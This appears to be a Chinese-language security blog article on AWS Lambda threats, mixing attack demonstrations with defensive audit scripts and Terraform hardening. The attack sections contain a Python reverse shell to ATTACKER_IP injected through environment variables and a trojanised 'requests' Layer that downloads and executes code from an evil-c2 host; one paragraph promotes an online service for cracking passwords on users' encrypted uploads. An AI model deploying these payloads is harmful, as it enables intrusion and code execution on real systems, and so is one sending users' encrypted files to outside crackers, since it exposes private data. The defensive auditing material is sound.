引言:Serverless 的安全幻觉 #
Serverless 架构以其弹性伸缩、按需付费、免运维等特性迅速成为云原生应用的主流选择。然而,“无服务器"不代表"无风险”。AWS Lambda、Azure Functions、Google Cloud Functions 等平台的共享责任模型中,安全配置的重担依然落在开发者肩上。
在实际的红蓝对抗项目中,我发现一个令人不安的事实:超过 60% 的生产环境 Lambda 函数存在不同程度的权限过度授予问题,而冷启动阶段的执行环境注入则是许多高级攻击者忽视的入口点。
本文将从攻击者视角出发,深入剖析 Serverless 架构的核心安全风险,涵盖冷启动劫持、权限逃逸、API Gateway 防护等关键领域,并提供可直接用于生产环境的防御方案。
Serverless 安全模型:共享责任与信任边界 #
共享责任模型解析 #
在 Serverless 架构中,安全责任被划分为云平台方和用户方两部分:
┌─────────────────────────────────────────────────────┐
│ 云平台方责任 │
│ ┌─────────────────────────────────────────────┐ │
│ │ 物理基础设施安全 │ Hypervisor 安全 │ 运行时 │ │
│ │ 网络基础设施 │ 容器隔离 │ 补丁管理 │ │
│ └─────────────────────────────────────────────┘ │
├─────────────────────────────────────────────────────┤
│ 用户方责任 │
│ ┌─────────────────────────────────────────────┐ │
│ │ IAM 角色配置 │ 函数代码安全 │ 环境变量管理 │ │
│ │ 数据加密 │ VPC 配置 │ 依赖包供应链 │ │
│ └─────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────┘大多数安全事件都发生在用户方责任域内。IAM 角色配置不当是最普遍的问题——开发者倾向于赋予函数 AdministratorAccess 或过度宽松的 * 权限,而非遵循最小权限原则。
IAM 角色与执行环境信任链 #
Lambda 的执行环境通过 IAM Role 获取临时凭证,这个信任关系是整个 Serverless 安全模型的核心:
Lambda Function
│
├──> Execution Role (IAM Role)
│ │
│ ├──> AssumeRolePolicyDocument (信任关系)
│ │ └──> Service: lambda.amazonaws.com
│ │
│ └──> Managed Policies / Inline Policies
│ ├──> S3: GetObject (data-bucket)
│ ├──> DynamoDB: Query (users-table)
│ └──> SecretsManager: GetSecretValue (prod/secrets)
│
└──> Runtime Environment (Ephemeral)
├──> Environment Variables
├──> /tmp (512MB 临时存储)
└──> Layer Dependencies (read-only)信任链的脆弱点在于:如果函数代码存在 SSRF、反序列化漏洞或命令注入,攻击者可以通过元数据服务或 SDK 获取执行角色的临时凭证,从而横向移动到其他 AWS 资源。
云函数冷启动劫持攻击 #
冷启动机制与攻击面 #
Serverless 函数的执行生命周期分为冷启动(Cold Start)和热复用(Warm/Hot Start)两个阶段:
Phase 1: Init (Cold Start Only)
┌───────────────────────────────────────────────┐
│ 1. 分配执行环境 (容器/微虚拟机) │
│ 2. 下载函数代码和 Layer │
│ 3. 注入环境变量 │
│ 4. 初始化运行时 (加载依赖、执行模块级代码) │
│ 5. 初始化 handler │
└───────────────────────────────────────────────┘
│
▼
Phase 2: Invoke (Every Invocation)
┌───────────────────────────────────────────────┐
│ 6. 调用 handler(event, context) │
│ 7. 处理业务逻辑 │
│ 8. 返回响应 │
└───────────────────────────────────────────────┘
│
▼ (Container reused or destroyed)
Phase 3: Shutdown (Container destruction)冷启动阶段的关键攻击向量包括:
- 环境变量注入:如果攻击者能修改函数配置,可以在环境变量中注入恶意值
- Layer 依赖劫持:通过篡改 Layer 中的 Python/Node.js 包实现代码执行
- 初始化脚本注入:利用 init 阶段加载恶意模块
- 竞争条件攻击:在容器初始化与首次调用之间插入恶意操作
攻击场景 1:环境变量注入实现冷启动劫持 #
假设攻击者通过某种方式获得了 lambda:UpdateFunctionConfiguration 权限(可能源于过度宽松的 IAM 策略),他们可以在函数下次冷启动时注入恶意环境变量:
# 攻击者利用过度宽松的 IAM 策略更新函数配置
import boto3
import base64
# 恶意 payload 被编码后注入到环境变量
malicious_code = """
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('ATTACKER_IP',4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(['/bin/sh','-i'])
"""
payload = base64.b64encode(malicious_code.encode()).decode()
client = boto3.client('lambda', region_name='us-east-1')
client.update_function_configuration(
FunctionName='vulnerable-data-processor',
Environment={
'Variables': {
'MALICIOUS_PAYLOAD': payload,
# 同时保留原有环境变量以避免被检测
'DATABASE_URL': 'postgresql://prod-db:5432/users',
'API_KEY': 'existing-key-not-modified'
}
}
)被感染的函数在模块初始化阶段执行恶意代码:
# vulnerable_function.py - 受害函数
import os
import base64
import boto3
# 恶意代码在模块加载时执行(冷启动阶段)
# 攻击者在 Layer 中植入了这段代码
def _init_malicious():
payload = os.environ.get('MALICIOUS_PAYLOAD', '')
if payload:
code = base64.b64decode(payload).decode()
exec(code) # 执行反弹 shell
# 模块级调用 - 在 handler 之前执行
_init_malicious()
def handler(event, context):
# 正常的业务逻辑保持不变
s3 = boto3.client('s3')
bucket = event.get('bucket')
key = event.get('key')
response = s3.get_object(Bucket=bucket, Key=key)
return {'statusCode': 200, 'body': response['Body'].read().decode()}攻击场景 2:Layer 依赖供应链攻击 #
Lambda Layer 是代码复用的重要机制,但也成为供应链攻击的目标。攻击者可以通过以下方式劫持 Layer:
# 攻击者上传恶意 Layer
import zipfile
import os
# 创建恶意 Python 包
def create_malicious_layer():
os.makedirs('malicious_layer/python/lib/python3.9/site-packages')
# 劫持常见的第三方库
with open('malicious_layer/python/lib/python3.9/site-packages/requests.py', 'w') as f:
f.write("""
# 伪装成 requests 库的恶意模块
import sys
import base64
import urllib.request
# 执行恶意代码
def _bootstrap():
try:
code_url = 'https://evil-c2.example.com/payload.bin'
response = urllib.request.urlopen(code_url)
payload = base64.b64decode(response.read())
exec(payload)
except:
pass
_bootstrap()
# 重新导出原始 requests 接口(隐藏自身)
from urllib.request import Request, urlopen
import json
def get(url, **kwargs):
import urllib.request
return urllib.request.urlopen(url)
def post(url, **kwargs):
import urllib.request
data = kwargs.get('data', '')
req = urllib.request.Request(url, data=data.encode() if isinstance(data, str) else data)
return urllib.request.urlopen(req)
""")
# 打包 Layer
with zipfile.ZipFile('malicious-layer.zip', 'w') as zf:
for root, dirs, files in os.walk('malicious_layer'):
for file in files:
filepath = os.path.join(root, file)
arcname = os.path.relpath(filepath, 'malicious_layer')
zf.write(filepath, arcname)
create_malicious_layer()防御者可以通过以下方式检测 Layer 被篡改:
#!/usr/bin/env python3
"""
Lambda Layer 完整性检测工具
检查已部署 Lambda 函数的 Layer 哈希值与基准对比
"""
import boto3
import hashlib
import json
import sys
from datetime import datetime
class LambdaLayerAuditor:
def __init__(self, region='us-east-1'):
self.lambda_client = boto3.client('lambda', region_name=region)
self.baseline_hashes = {}
self.baseline_file = 'lambda_layer_baseline.json'
def scan_all_functions(self):
"""扫描所有 Lambda 函数及其 Layer"""
results = {
'scan_time': datetime.utcnow().isoformat(),
'functions': [],
'anomalies': []
}
paginator = self.lambda_client.get_paginator('list_functions')
for page in paginator.paginate():
for func in page['Functions']:
func_name = func['FunctionName']
layers = func.get('Layers', [])
func_info = {
'name': func_name,
'layers': [],
'last_modified': func.get('LastModified')
}
for layer in layers:
layer_arn = layer['Arn']
layer_version = layer_arn.split(':')[-1]
# 获取 Layer 代码 SHA256
try:
layer_config = self.lambda_client.get_layer_version_by_arn(
Arn=layer_arn
)
code_sha = layer_config['CodeSha256']
code_size = layer_config['CodeSize']
func_info['layers'].append({
'arn': layer_arn,
'sha256': code_sha,
'size': code_size,
'created': layer_config.get('CreatedPosition')
})
# 与基准对比
if layer_arn in self.baseline_hashes:
if self.baseline_hashes[layer_arn] != code_sha:
anomaly = {
'function': func_name,
'layer': layer_arn,
'expected_hash': self.baseline_hashes[layer_arn],
'actual_hash': code_sha,
'severity': 'CRITICAL',
'description': 'Layer hash mismatch detected - possible tampering'
}
results['anomalies'].append(anomaly)
print(f"[CRITICAL] Layer modified: {func_name} -> {layer_arn}")
except Exception as e:
print(f"[ERROR] Failed to audit layer {layer_arn}: {e}")
results['functions'].append(func_info)
return results
def load_baseline(self):
"""加载已知基准哈希"""
try:
with open(self.baseline_file, 'r') as f:
data = json.load(f)
self.baseline_hashes = data.get('layer_hashes', {})
except FileNotFoundError:
print(f"[*] No baseline file found at {self.baseline_file}")
self.baseline_hashes = {}
def save_baseline(self, results):
"""保存当前扫描结果作为新基准"""
baseline = {
'created': datetime.utcnow().isoformat(),
'layer_hashes': {}
}
for func in results.get('functions', []):
for layer in func.get('layers', []):
baseline['layer_hashes'][layer['arn']] = layer['sha256']
with open(self.baseline_file, 'w') as f:
json.dump(baseline, f, indent=2)
print(f"[*] Baseline saved to {self.baseline_file}")
if __name__ == '__main__':
auditor = LambdaLayerAuditor()
auditor.load_baseline()
results = auditor.scan_all_functions()
print(f"\n{'='*60}")
print(f"Scan completed: {results['scan_time']}")
print(f"Functions scanned: {len(results['functions'])}")
print(f"Anomalies detected: {len(results['anomalies'])}")
if results['anomalies']:
print(f"\n[!] ANOMALIES DETAIL:")
for anomaly in results['anomalies']:
print(f" Function: {anomaly['function']}")
print(f" Layer: {anomaly['layer']}")
print(f" Expected: {anomaly['expected_hash']}")
print(f" Actual: {anomaly['actual_hash']}")
print(f" {'─'*50}")
# 首次运行或确认无异常时保存基准
if not results['anomalies']:
auditor.save_baseline(results)权限逃逸:IAM 过度授权的连锁反应 #
权限提升攻击链 #
在 Serverless 环境中,权限逃逸往往不是单一漏洞利用,而是多个配置缺陷的串联:
初始访问 (Initial Access)
│
├──> SSRF in Lambda function
│ └──> Access 169.254.169.254 metadata
│ └──> Retrieve temporary credentials
│ │
│ ├──> IAM: ListRoles
│ │ └──> Find overprivileged roles
│ │
│ ├──> S3: ListAllMyBuckets
│ │ └──> Exfiltrate data
│ │
│ └──> sts:AssumeRole
│ └──> Lateral movement
│
└──> Environment Variable Injection
└──> Modify function config
└──> UpdateFunctionConfiguration
└──> Code execution on next cold start检测过度宽松的 IAM 策略 #
以下 Python 脚本可以扫描 AWS 账户中的所有 Lambda 执行角色,识别过度授权的策略:
#!/usr/bin/env python3
"""
Lambda IAM 权限审计工具
识别过度授权的 Lambda 执行角色并提供修复建议
"""
import boto3
import json
import re
from typing import Dict, List, Tuple
class LambdaIAMAuditor:
# 危险操作模式 - 这些权限在 Lambda 中通常不需要
DANGEROUS_ACTIONS = {
'iam:*': ('CRITICAL', 'Full IAM access allows privilege escalation'),
'iam:CreateUser': ('HIGH', 'Can create new IAM users'),
'iam:AttachUserPolicy': ('CRITICAL', 'Can attach arbitrary policies'),
'iam:CreateAccessKey': ('HIGH', 'Can create access keys for any user'),
'sts:AssumeRole': ('HIGH', 'Can assume other roles for lateral movement'),
's3:*': ('MEDIUM', 'Full S3 access - scope to specific buckets'),
'dynamodb:*': ('MEDIUM', 'Full DynamoDB access - scope to specific tables'),
'lambda:*': ('HIGH', 'Full Lambda access - can modify other functions'),
'ec2:*': ('HIGH', 'Full EC2 access - uncommonly needed in Lambda'),
'logs:*': ('LOW', 'Consider scoping to specific log groups'),
}
# 通配符资源模式 - 过于宽泛
WILDCARD_RESOURCE_PATTERNS = [
(r'^arn:aws:s3:::\*$', 'S3 wildcard on all buckets'),
(r'^arn:aws:iam::\d+:user/\*$', 'IAM wildcard on all users'),
(r'^\*$', 'Resource wildcard - applies to all resources'),
]
def __init__(self, region='us-east-1'):
self.iam_client = boto3.client('iam', region_name=region)
self.lambda_client = boto3.client('lambda', region_name=region)
self.findings = []
def audit_all_lambda_roles(self) -> Dict:
"""审计所有 Lambda 函数的 IAM 角色"""
audit_report = {
'total_functions': 0,
'overprivileged_functions': 0,
'findings': [],
'recommendations': []
}
# 获取所有 Lambda 函数
functions = self._get_all_lambda_functions()
audit_report['total_functions'] = len(functions)
for func in functions:
role_arn = func.get('Role', '')
if not role_arn:
continue
role_name = role_arn.split('/')[-1]
findings = self._audit_role(role_name, func['FunctionName'])
if findings:
audit_report['overprivileged_functions'] += 1
for finding in findings:
finding['function_name'] = func['FunctionName']
finding['role_name'] = role_name
audit_report['findings'].extend(findings)
audit_report['recommendations'] = self._generate_recommendations(
audit_report['findings']
)
return audit_report
def _get_all_lambda_functions(self) -> List[Dict]:
"""获取所有 Lambda 函数"""
functions = []
paginator = self.lambda_client.get_paginator('list_functions')
for page in paginator.paginate():
functions.extend(page['Functions'])
return functions
def _audit_role(self, role_name: str, function_name: str) -> List[Dict]:
"""审计单个 IAM 角色"""
findings = []
# 获取角色的内联策略
inline_policies = self.iam_client.list_role_policies(
RoleName=role_name
)['PolicyNames']
for policy_name in inline_policies:
policy_doc = self.iam_client.get_role_policy(
RoleName=role_name,
PolicyName=policy_name
)
findings.extend(self._analyze_policy(
policy_doc['PolicyDocument'],
f"Inline policy: {policy_name}"
))
# 获取附加的托管策略
attached_policies = self.iam_client.list_attached_role_policies(
RoleName=role_name
)['AttachedPolicies']
for policy in attached_policies:
policy_arn = policy['PolicyArn']
policy_version = self.iam_client.get_policy(
PolicyArn=policy_arn
)['Policy']['DefaultVersionId']
default_policy = self.iam_client.get_policy_version(
PolicyArn=policy_arn,
VersionId=policy_version
)
findings.extend(self._analyze_policy(
default_policy['PolicyVersion']['Document'],
f"Managed policy: {policy['PolicyName']}"
))
return findings
def _analyze_policy(self, policy_doc: Dict, source: str) -> List[Dict]:
"""分析单个 IAM 策略文档"""
findings = []
for statement in policy_doc.get('Statement', []):
if statement.get('Effect') != 'Allow':
continue
actions = statement.get('Action', [])
if isinstance(actions, str):
actions = [actions]
resources = statement.get('Resource', [])
if isinstance(resources, str):
resources = [resources]
# 检查危险操作
for action in actions:
severity, description = self._check_dangerous_action(action)
if severity:
# 检查是否有条件约束
has_conditions = 'Condition' in statement
finding = {
'severity': severity,
'action': action,
'source': source,
'resources': resources,
'description': description,
'has_conditions': has_conditions,
'condition_keys': list(
statement.get('Condition', {}).keys()
) if has_conditions else []
}
# 有条件约束的严重问题降级
if has_conditions and severity == 'CRITICAL':
finding['severity'] = 'HIGH'
findings.append(finding)
# 检查通配符资源
for resource in resources:
for pattern, desc in self.WILDCARD_RESOURCE_PATTERNS:
if re.match(pattern, resource):
findings.append({
'severity': 'HIGH',
'action': 'Wildcard Resource',
'source': f"{source} - {desc}",
'resources': [resource],
'description': f'Overly broad resource scope: {desc}',
'has_conditions': False,
'condition_keys': []
})
return findings
def _check_dangerous_action(self, action: str) -> Tuple[str, str]:
"""检查操作是否在危险列表中"""
# 精确匹配
if action in self.DANGEROUS_ACTIONS:
return self.DANGEROUS_ACTIONS[action]
# 通配符匹配 (e.g., s3:* matches s3:GetObject, s3:PutObject, etc.)
service = action.split(':')[0] if ':' in action else ''
if action.endswith(':*'):
wildcard_key = f"{service}:*"
if wildcard_key in self.DANGEROUS_ACTIONS:
return self.DANGEROUS_ACTIONS[wildcard_key]
return ('', '')
def _generate_recommendations(self, findings: List[Dict]) -> List[str]:
"""基于审计结果生成修复建议"""
recommendations = []
seen = set()
for finding in findings:
rec = self._actionable_recommendation(finding)
if rec and rec not in seen:
recommendations.append(rec)
seen.add(rec)
return recommendations
def _actionable_recommendation(self, finding: Dict) -> str:
"""生成可操作的修复建议"""
action = finding['action']
if action == 'iam:*':
return (
"Remove iam:* and grant only specific IAM actions needed. "
"Example: iam:GetRole, iam:PassRole (only for specific roles)"
)
elif action == 's3:*':
return (
"Scope S3 permissions to specific buckets and actions. "
"Example: s3:GetObject and s3:PutObject on arn:aws:s3:::my-bucket/*"
)
elif action == 'lambda:*':
return (
"Remove lambda:* permissions from Lambda execution roles. "
"Functions should not modify other functions."
)
elif '*' in finding.get('resources', ['']):
return (
"Replace wildcard resources with specific ARNs. "
"Limit to specific buckets, tables, and secrets."
)
return f"Review and restrict: {finding['description']}"
# 使用示例
if __name__ == '__main__':
auditor = LambdaIAMAuditor(region='us-east-1')
report = auditor.audit_all_lambda_roles()
print(f"\n{'='*60}")
print(f"Lambda IAM Security Audit Report")
print(f"{'='*60}")
print(f"Total functions: {report['total_functions']}")
print(f"Overprivileged: {report['overprivileged_functions']}")
print(f"Total findings: {len(report['findings'])}")
# 按严重程度统计
severity_counts = {}
for f in report['findings']:
sev = f['severity']
severity_counts[sev] = severity_counts.get(sev, 0) + 1
print(f"\nFindings by severity:")
for sev in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
if sev in severity_counts:
print(f" [{sev}] {severity_counts[sev]}")
if report['findings']:
print(f"\n{'─'*60}")
print("Critical Findings:")
for f in report['findings']:
if f['severity'] in ('CRITICAL', 'HIGH'):
print(f"\n [{f['severity']}] {f['function_name']}")
print(f" Role: {f['role_name']}")
print(f" Action: {f['action']}")
print(f" Source: {f['source']}")
print(f" Resources: {', '.join(f['resources'])}")
if report['recommendations']:
print(f"\n{'─'*60}")
print("Recommendations:")
for i, rec in enumerate(report['recommendations'], 1):
print(f" {i}. {rec}")数据保护与加密验证在 Serverless 中的实践 #
在 Serverless 架构中,云函数经常需要处理用户上传的加密数据(例如加密文件、加密附件等)。对于安全团队来说,验证这些加密文件的访问权限是渗透测试和合规审计中的重要环节。在进行安全测试时,如果需要对用户上传的加密文件进行访问验证,可以使用一些辅助工具快速确认加密文件的密码保护状态——例如猫密网 (Catpasswd) 提供了在线的加密文件密码恢复服务,安全人员可以用它来快速验证加密上传文件是否使用了弱口令,而无需在本地部署暴力破解工具,这在自动化测试流水线上尤其实用。
API Gateway 安全:速率限制与 WAF 集成 #
API Gateway 攻击面 #
API Gateway 是 Serverless 应用的主要入口,其安全问题直接影响整个后端:
Internet
│
┌────▼────┐
│ WAF │ ◄── Web Application Firewall
│ Rules │ (SQLi, XSS, Rate limiting)
└────┬────┘
│
┌────▼────┐
│ API │ ◄── API Gateway
│ Gateway │ (Auth, Throttling, Usage Plans)
└────┬────┘
│
┌────────┼────────┐
│ │ │
┌────▼──┐ ┌──▼───┐ ┌──▼────┐
│Lambda │ │Lambda│ │Lambda │
│ /auth │ │/data │ │ /admin│
└───────┘ └──────┘ └───────┘API Gateway 安全配置最佳实践 #
# Terraform: API Gateway 安全配置
resource "aws_wafv2_web_acl" "api_gateway_waf" {
name = "api-gateway-waf"
description = "WAF for API Gateway protection"
scope = "REGIONAL"
default_action {
allow {}
}
rule {
name = "AWSManagedRulesCommonRuleSet"
priority = 1
override_action {
none {}
}
statement {
managed_rule_group_statement {
name = "AWSManagedRulesCommonRuleSet"
vendor_name = "AWS"
# 排除误报(根据实际情况调整)
excluded_rule {
name = "SizeRestrictions_BODY"
}
}
}
visibility_config {
cloudwatch_metrics_enabled = true
sampled_requests_enabled = true
metric_name = "CommonRuleSet"
}
}
rule {
name = "RateLimiting"
priority = 2
action {
block {}
}
statement {
rate_based_statement {
limit = 1000 # 每 5 分钟 1000 请求
aggregate_key_type = "IP"
scope_down_statement {
not_statement {
statement {
byte_match_statement {
field_to_match {
uri_path {}
}
position_constraint = "STARTS_WITH"
search_string = "/health"
text_transformation {
priority = 0
type = "NONE"
}
}
}
}
}
}
}
visibility_config {
cloudwatch_metrics_enabled = true
sampled_requests_enabled = true
metric_name = "RateLimiting"
}
}
rule {
name = "GeoBlocking"
priority = 3
action {
block {}
}
statement {
not_statement {
statement {
geo_match_statement {
country_codes = ["CN", "US", "JP", "SG"]
}
}
}
}
visibility_config {
cloudwatch_metrics_enabled = true
sampled_requests_enabled = true
metric_name = "GeoBlocking"
}
}
visibility_config {
cloudwatch_metrics_enabled = true
sampled_requests_enabled = true
metric_name = "api-gateway-waf"
}
}
# API Gateway 方法级别的速率限制
resource "aws_api_gateway_rest_api" "secure_api" {
name = "secure-serverless-api"
description = "Serverless API with security controls"
}
resource "aws_api_gateway_stage" "production" {
rest_api_id = aws_api_gateway_rest_api.secure_api.id
stage_name = "production"
deployment_id = aws_api_gateway_deployment.secure.id
# 阶段级别的速率限制和突增限制
access_log_settings {
destination_arn = aws_cloudwatch_log_group.api_gw.arn
format = jsonencode({
requestId = "$context.requestId"
ip = "$context.identity.sourceIp"
requestTime = "$context.requestTime"
httpMethod = "$context.httpMethod"
resourcePath = "$context.resourcePath"
status = "$context.status"
protocol = "$context.protocol"
responseLength = "$context.responseLength"
userAgent = "$context.identity.userAgent"
})
}
# Method-level throttling
method_settings {
stage_name = "production"
resource_path = "/*"
http_method = "*"
throttling_burst_limit = 500
throttling_rate_limit = 1000
logging_level = "INFO"
data_trace_enabled = false # 敏感数据不记录到日志
}
}安全的 Lambda 函数部署:Terraform 最佳实践 #
以下 Terraform 配置展示了一个安全加固的 Lambda 函数部署模板,包含 VPC 隔离、最小权限 IAM、加密和监控:
# =============================================================================
# 安全 Lambda 函数部署 - Terraform 最佳实践
# =============================================================================
# 1. Lambda 执行角色 - 最小权限原则
resource "aws_iam_role" "lambda_execution" {
name = "secure-lambda-execution-role"
assume_role_policy = jsonencode({
Version = "2012-10-17"
Statement = [
{
Action = "sts:AssumeRole"
Effect = "Allow"
Principal = {
Service = "lambda.amazonaws.com"
}
}
]
})
# 防止意外删除
force_detach_policies = true
max_session_duration = 3600 # 1 小时,限制临时凭证有效期
}
# 2. 精确权限策略 - 按实际需要定义
resource "aws_iam_role_policy" "lambda_precise_policy" {
name = "lambda-precise-permissions"
role = aws_iam_role.lambda_execution.id
policy = jsonencode({
Version = "2012-10-17"
Statement = [
# CloudWatch Logs - 精确到函数特定的 log group
{
Effect = "Allow"
Action = [
"logs:CreateLogGroup",
"logs:CreateLogStream",
"logs:PutLogEvents"
]
Resource = "arn:aws:logs:${var.aws_region}:${var.account_id}:log-group:/aws/lambda/${var.function_name}:*"
},
# S3 - 仅特定 bucket 的读写操作
{
Effect = "Allow"
Action = [
"s3:GetObject",
"s3:PutObject"
]
Resource = "${aws_s3_bucket.data.arn}/*"
Condition = {
StringEquals = {
"s3:x-amz-server-side-encryption" = "AES256"
}
}
},
# Secrets Manager - 仅获取特定密钥
{
Effect = "Allow"
Action = [
"secretsmanager:GetSecretValue"
]
Resource = aws_secretsmanager_secret.db_credentials.arn
},
# VPC 网络接口 (ENI) - 用于 VPC 内访问
{
Effect = "Allow"
Action = [
"ec2:CreateNetworkInterface",
"ec2:DescribeNetworkInterfaces",
"ec2:DeleteNetworkInterface"
]
Resource = "*"
}
]
})
}
# 3. Lambda 函数 - 安全配置
resource "aws_lambda_function" "secure_function" {
function_name = var.function_name
role = aws_iam_role.lambda_execution.arn
handler = "index.handler"
runtime = "python3.11"
timeout = 30 # 合理的超时限制
memory_size = 256 # 最小够用原则
publish = true # 发布版本,便于回滚
# 代码包
filename = data.archive_file.lambda_output.output_path
source_code_hash = data.archive_file.lambda_output.output_base64sha256
# VPC 配置 - 隔离执行环境
vpc_config {
subnet_ids = var.private_subnet_ids
security_group_ids = [aws_security_group.lambda_sg.id]
}
# 环境变量 - 不直接存储敏感信息
environment {
variables = {
ENV = "production"
DB_SECRET_ARN = aws_secretsmanager_secret.db_credentials.arn
S3_BUCKET_NAME = aws_s3_bucket.data.id
LOG_LEVEL = "WARN"
# 敏感值通过 Secrets Manager 动态获取
}
}
# 死信队列 - 处理失败消息
dead_letter_config {
target_arn = aws_sqs_lambda_dlq.arn
}
# 版本控制和并行部署
tracing_config {
mode = "Active" # X-Ray 追踪
}
tags = {
Environment = "production"
Security = "hardened"
}
lifecycle {
ignore_changes = [last_modified]
}
}
# 4. 安全组 - 最小网络访问
resource "aws_security_group" "lambda_sg" {
name = "lambda-secure-sg"
description = "Security group for Lambda with minimal network access"
vpc_id = var.vpc_id
# 出站 - 仅允许到特定目标
egress {
description = "HTTPS to Secrets Manager endpoint"
from_port = 443
to_port = 443
protocol = "tcp"
cidr_blocks = ["10.0.0.0/16"] # 仅 VPC 内
}
egress {
description = "HTTPS to S3 endpoint"
from_port = 443
to_port = 443
protocol = "tcp"
cidr_blocks = ["10.0.0.0/16"]
}
# 无入站规则 - Lambda 不需要接收入站连接
lifecycle {
create_before_destroy = true
}
tags = {
Name = "lambda-secure-sg"
}
}
# 5. 密钥存储 - 使用 Secrets Manager
resource "aws_secretsmanager_secret" "db_credentials" {
name = "prod/lambda/db-credentials"
description = "Database credentials for Lambda function"
recovery_window_in_days = 30 # 防止意外删除
# 启用 KMS 加密
kms_key_id = aws_kms_key.secrets.arn
}
resource "aws_secretsmanager_secret_version" "db_credentials" {
secret_id = aws_secretsmanager_secret.db_credentials.id
secret_string = jsonencode({
username = "lambda_reader"
password = var.db_password # 通过变量传入,不硬编码
host = aws_db_instance.primary.address
port = "5432"
dbname = "appdb"
})
}
# 6. 监控和告警
resource "aws_cloudwatch_metric_alarm" "lambda_errors" {
alarm_name = "${var.function_name}-error-rate"
comparison_operator = "GreaterThanThreshold"
evaluation_periods = "2"
metric_name = "Errors"
namespace = "AWS/Lambda"
period = "300"
statistic = "Sum"
threshold = "5"
alarm_description = "Lambda function error rate exceeded threshold"
dimensions = {
FunctionName = aws_lambda_function.secure_function.function_name
}
alarm_actions = [aws_sns_topic.security_alerts.arn]
}
resource "aws_cloudwatch_metric_alarm" "lambda_throttles" {
alarm_name = "${var.function_name}-throttles"
comparison_operator = "GreaterThanThreshold"
evaluation_periods = "1"
metric_name = "Throttles"
namespace = "AWS/Lambda"
period = "60"
statistic = "Sum"
threshold = "0"
alarm_description = "Lambda function is being throttled"
dimensions = {
FunctionName = aws_lambda_function.secure_function.function_name
}
}安全 Lambda 函数代码示例 #
"""
安全 Lambda 函数 - 最佳实践示例
包含输入验证、秘密管理、安全日志、错误处理
"""
import os
import json
import boto3
import logging
import hashlib
import hmac
from typing import Dict, Any, Optional
from botocore.exceptions import ClientError
# 安全日志配置 - 不记录敏感信息
logger = logging.getLogger()
logger.setLevel(os.environ.get('LOG_LEVEL', 'WARN'))
# 初始化 AWS 客户端 (在 handler 外部利用容器复用)
secrets_client = boto3.client('secretsmanager')
s3_client = boto3.client('s3')
# 配置
MAX_PAYLOAD_SIZE = 1024 * 1024 # 1MB 最大请求体
ALLOWED_CONTENT_TYPES = {'application/json'}
RATE_LIMIT_WINDOW = 300 # 秒
def get_secret(secret_arn: str) -> Dict[str, str]:
"""安全地从 Secrets Manager 获取凭证"""
try:
response = secrets_client.get_secret_value(SecretId=secret_arn)
secret = json.loads(response['SecretString'])
logger.info(f"Secret retrieved: {hashlib.sha256(secret_arn.encode()).hexdigest()[:8]}...")
return secret
except ClientError as e:
error_code = e.response['Error']['Code']
if error_code == 'ResourceNotFoundException':
logger.error(f"Secret not found: {secret_arn[:20]}...")
elif error_code == 'AccessDeniedException':
logger.error(f"Access denied to secret")
else:
logger.error(f"Secret retrieval failed: {error_code}")
raise
def validate_input(event: Dict[str, Any]) -> Dict[str, Any]:
"""严格的输入验证"""
errors = []
# 检查请求体大小
body = event.get('body', '')
if body and len(body) > MAX_PAYLOAD_SIZE:
errors.append(f"Request body exceeds maximum size of {MAX_PAYLOAD_SIZE} bytes")
# 验证 Content-Type
headers = event.get('headers', {})
content_type = headers.get('Content-Type', headers.get('content-type', ''))
if content_type and content_type not in ALLOWED_CONTENT_TYPES:
errors.append(f"Unsupported Content-Type: {content_type}")
# 检查必需的参数
required_params = ['action', 'data']
if isinstance(body, str):
try:
body = json.loads(body)
except json.JSONDecodeError:
errors.append("Invalid JSON in request body")
for param in required_params:
if param not in body:
errors.append(f"Missing required parameter: {param}")
# 输入净化 - 防止注入
if 'data' in body:
data = body['data']
if isinstance(data, str):
# 检测潜在的命令注入模式
dangerous_patterns = [';', '|', '&', '$(', '`', '\\x', '\\0']
for pattern in dangerous_patterns:
if pattern in data:
errors.append(f"Suspicious pattern detected in input")
break
if errors:
return {'valid': False, 'errors': errors}
return {'valid': True, 'data': body}
def create_security_header() -> Dict[str, str]:
"""生成安全的 HTTP 响应头"""
return {
'Content-Type': 'application/json',
'X-Content-Type-Options': 'nosniff',
'X-Frame-Options': 'DENY',
'X-XSS-Protection': '1; mode=block',
'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
'Cache-Control': 'no-store, no-cache, must-revalidate',
'Pragma': 'no-cache',
# 移除 Server 头信息
}
def handler(event: Dict[str, Any], context) -> Dict[str, Any]:
"""Lambda handler - 安全实现"""
request_id = context.aws_request_id
try:
# 1. 输入验证
validation = validate_input(event)
if not validation['valid']:
logger.warning(
f"Input validation failed: {validation['errors']}",
extra={'request_id': request_id}
)
return {
'statusCode': 400,
'headers': create_security_header(),
'body': json.dumps({
'error': 'Invalid request',
'message': 'Request validation failed'
})
}
# 2. 获取数据库凭证(动态,不缓存)
db_secret_arn = os.environ.get('DB_SECRET_ARN')
if not db_secret_arn:
raise EnvironmentError("Database secret ARN not configured")
db_credentials = get_secret(db_secret_arn)
# 3. 业务逻辑处理
data = validation['data']
result = process_request(data, db_credentials, request_id)
return {
'statusCode': 200,
'headers': create_security_header(),
'body': json.dumps(result)
}
except Exception as e:
# 4. 安全错误处理 - 不泄露内部信息
logger.error(
f"Unhandled exception: {type(e).__name__}",
extra={
'request_id': request_id,
'error_type': type(e).__name__
},
exc_info=True
)
return {
'statusCode': 500,
'headers': create_security_header(),
'body': json.dumps({
'error': 'Internal server error',
'request_id': request_id # 用于追踪,不泄露堆栈
})
}
def process_request(data: Dict, credentials: Dict, request_id: str) -> Dict:
"""处理业务请求"""
action = data.get('action')
# 基于角色的操作路由(而非直接 eval/反射)
action_handlers = {
'query': handle_query,
'upload': handle_upload,
'status': handle_status,
}
handler_func = action_handlers.get(action)
if not handler_func:
raise ValueError(f"Unknown action: {action}")
return handler_func(data, credentials, request_id)防御总结:Serverless 安全加固清单 #
┌─────────────────────────────────────────────────────────────┐
│ Serverless 安全加固清单 │
├─────────────────────────────────────────────────────────────┤
│ │
│ [ ] IAM 权限 │
│ │ - 使用最小权限原则 │
│ │ - 禁用 iam:* 和 *:* 策略 │
│ │ - 定期审计执行角色权限 (使用上述审计脚本) │
│ │ - 启用 IAM Access Analyzer │
│ │ │
│ [ ] 代码安全 │
│ │ - 输入验证和净化 │
